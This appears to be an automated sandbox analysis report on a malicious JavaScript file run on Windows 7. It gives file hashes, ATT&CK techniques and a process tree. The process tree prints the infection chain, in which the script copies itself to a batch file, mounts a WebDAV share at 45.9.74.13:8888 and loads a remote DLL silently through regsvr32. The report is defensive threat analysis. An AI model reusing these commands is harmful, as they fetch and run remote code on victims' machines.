df085d537d229075c1fbda32e736671566e856ccb2258b06d4666c315d980e91

Analysis

max time kernel
10s
max time network
16s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
09/07/2024, 08:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

28034278092616319677.js
Size

14KB
MD5

1234aebaf9d395b177bfa95b56c61dc2
SHA1

b8458ddbfec3baf6433537a68ed36076daace166
SHA256

df085d537d229075c1fbda32e736671566e856ccb2258b06d4666c315d980e91
SHA512

dfdd614329a595df31a3a5a61ab14fd8a425f55f6c6696aa30173b5727a65ee06f586ed65ad6709aba339876082be334930a619b6c77d102c03d096eccedbcd9
SSDEEP

384:F7iiDcO+vvck10SOuTVgb/NdVQzRNs83YY83Ye:8Ac/cvF7dqe

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
3052	regsvr32.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2124 wrote to memory of 2904	2124	wscript.exe	29
PID 2124 wrote to memory of 2904	2124	wscript.exe	29
PID 2124 wrote to memory of 2904	2124	wscript.exe	29
PID 2904 wrote to memory of 2704	2904	cmd.exe	31
PID 2904 wrote to memory of 2704	2904	cmd.exe	31
PID 2904 wrote to memory of 2704	2904	cmd.exe	31
PID 2904 wrote to memory of 3052	2904	cmd.exe	32
PID 2904 wrote to memory of 3052	2904	cmd.exe	32
PID 2904 wrote to memory of 3052	2904	cmd.exe	32
PID 2904 wrote to memory of 3052	2904	cmd.exe	32
PID 2904 wrote to memory of 3052	2904	cmd.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\28034278092616319677.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2124
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\28034278092616319677.js" "C:\Users\Admin\AppData\Local\Temp\\prepareringwooden.bat" && "C:\Users\Admin\AppData\Local\Temp\\prepareringwooden.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2904
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:2704
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\17.dll
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:3052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\prepareringwooden.bat

Filesize
14KB

MD5
1234aebaf9d395b177bfa95b56c61dc2

SHA1
b8458ddbfec3baf6433537a68ed36076daace166

SHA256
df085d537d229075c1fbda32e736671566e856ccb2258b06d4666c315d980e91

SHA512
dfdd614329a595df31a3a5a61ab14fd8a425f55f6c6696aa30173b5727a65ee06f586ed65ad6709aba339876082be334930a619b6c77d102c03d096eccedbcd9

Download Submit